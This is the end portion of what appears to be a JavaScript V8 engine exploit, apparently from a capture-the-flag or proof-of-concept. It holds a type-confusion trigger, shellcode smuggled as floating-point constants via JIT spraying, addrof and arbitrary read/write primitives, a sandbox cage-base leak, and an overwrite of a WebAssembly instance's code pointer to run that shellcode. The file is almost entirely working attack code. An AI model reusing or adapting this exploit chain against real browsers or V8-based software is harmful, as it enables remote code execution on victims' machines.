| 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 281 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 282 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 283 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 284 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 285 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 286 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 287 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 288 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 289 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 290 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 291 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 292 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 293 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 294 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 295 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 296 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 297 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 298 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 299 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 300 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 301 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 302 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 303 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 304 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 305 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 306 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 307 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 308 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 309 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 310 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 311 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 312 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 313 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 314 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 315 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 316 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 317 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 318 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 319 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 320 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 321 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 322 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 323 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 324 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 325 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 326 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 327 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 328 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 329 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 330 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 331 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 332 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 333 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 334 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 335 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 336 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 337 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 338 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 339 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 340 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 341 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 342 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 343 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 344 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 345 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 346 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 347 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 348 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 349 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 350 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 351 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 352 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 353 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 354 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 355 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 356 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 357 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 358 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 359 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 360 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 361 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 362 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 363 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 364 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 365 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 366 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 367 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 368 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 369 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 370 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 371 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 372 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 373 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 374 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 375 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 376 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 377 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 378 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 379 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 380 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 381 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 382 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 383 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 384 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 385 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 386 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 387 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 388 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 389 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 390 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 391 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 392 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 393 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 394 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 395 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 396 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 397 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 398 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 399 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 400 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 401 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 402 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 403 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 404 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 405 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 406 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 407 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 408 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 409 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 410 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 411 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 412 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 413 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 414 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 415 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 416 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 417 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 418 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 419 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 420 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 421 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 422 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 423 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 424 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 425 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 426 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 427 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 428 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 429 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 430 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 431 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 432 | ]; 433 | 434 | let esc; 435 | function trigger(callback) { 436 | for (const key in object2) { 437 | callback(); 438 | esc = object2[key]; 439 | } 440 | } 441 | 442 | for (let i = 0; i < 0x10000; i++) { 443 | trigger((_) => _); 444 | trigger((_) => _); 445 | trigger((_) => _); 446 | trigger((_) => _); 447 | } 448 | sleep(2000); 449 | trigger((_) => { 450 | object3.c = 1.1; 451 | for (const key in object1) { 452 | } 453 | }); 454 | 455 | //exec "/win" for test 456 | const shellcode = () => { 457 | return [ 458 | 1.97118289794847608001401956399e-246, 459 | 1.95606125617386423530332076722e-246, 460 | 1.99957147195425773436923756715e-246, 461 | 1.95337673326740932133292175341e-246, 462 | 2.63486047652296056448306022844e-284, 463 | ]; 464 | }; 465 | 466 | for (var i = 0; i < 0x10000; i++) { 467 | shellcode(); 468 | shellcode(); 469 | shellcode(); 470 | shellcode(); 471 | } 472 | sleep(2000); 473 | // fake_object_array; 474 | // %DebugPrint(driver_array); 475 | // %DebugPrint(float_array); 476 | // %DebugPrint(obj_array); 477 | // %DebugPrint(esc); 478 | 479 | function addrof(obj) { 480 | obj_array[0] = obj; 481 | return helper.ftoil(esc[14]); 482 | } 483 | // let a = {}; 484 | // %DebugPrint(a); 485 | // // console.log(helper.hex(addrof(a))); 486 | function aar(addr) { 487 | const fake_length_elements = helper.pair_i32_to_f64(addr - 8, 8); 488 | esc[12] = fake_length_elements; 489 | return float_array[0]; 490 | } 491 | let cagebase = helper.ftoil(aar(0x300078 + 1)); 492 | // %DebugPrint(helper.hex(cagebase)); 493 | function aaw(addr, value) { 494 | const fake_length_elements = helper.pair_i32_to_f64(addr - 8, 8); 495 | esc[12] = fake_length_elements; 496 | float_array[0] = value; 497 | } 498 | 499 | var wasmCode = new Uint8Array([ 500 | 0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 501 | 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 502 | 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 503 | 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 504 | 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11, 505 | ]); 506 | var wasmModule = new WebAssembly.Module(wasmCode); 507 | var wasmInstance = new WebAssembly.Instance(wasmModule, {}); 508 | var f = wasmInstance.exports.main; 509 | 510 | let wasm_instance_addr = addrof(wasmInstance); 511 | // %DebugPrint(shellcode); 512 | let code_addr = aar(addrof(shellcode) + 8); 513 | let ins_addr = aar(helper.ftoih(code_addr) + 0x10); 514 | let real_addr = helper.pair_i32_to_f64( 515 | helper.ftoih(ins_addr) + 0x7d, 516 | cagebase 517 | ); 518 | // %DebugPrint(helper.hex(helper.f64toi64(real_addr))); 519 | // %DebugPrint(helper.hex(wasm_instance_addr)); 520 | // %DebugPrint(wasmInstance); 521 | aaw(wasm_instance_addr + 0x48, real_addr); 522 | f(); 523 | hang(); 524 | } 525 | 526 | pwn(); 527 | --------------------------------------------------------------------------------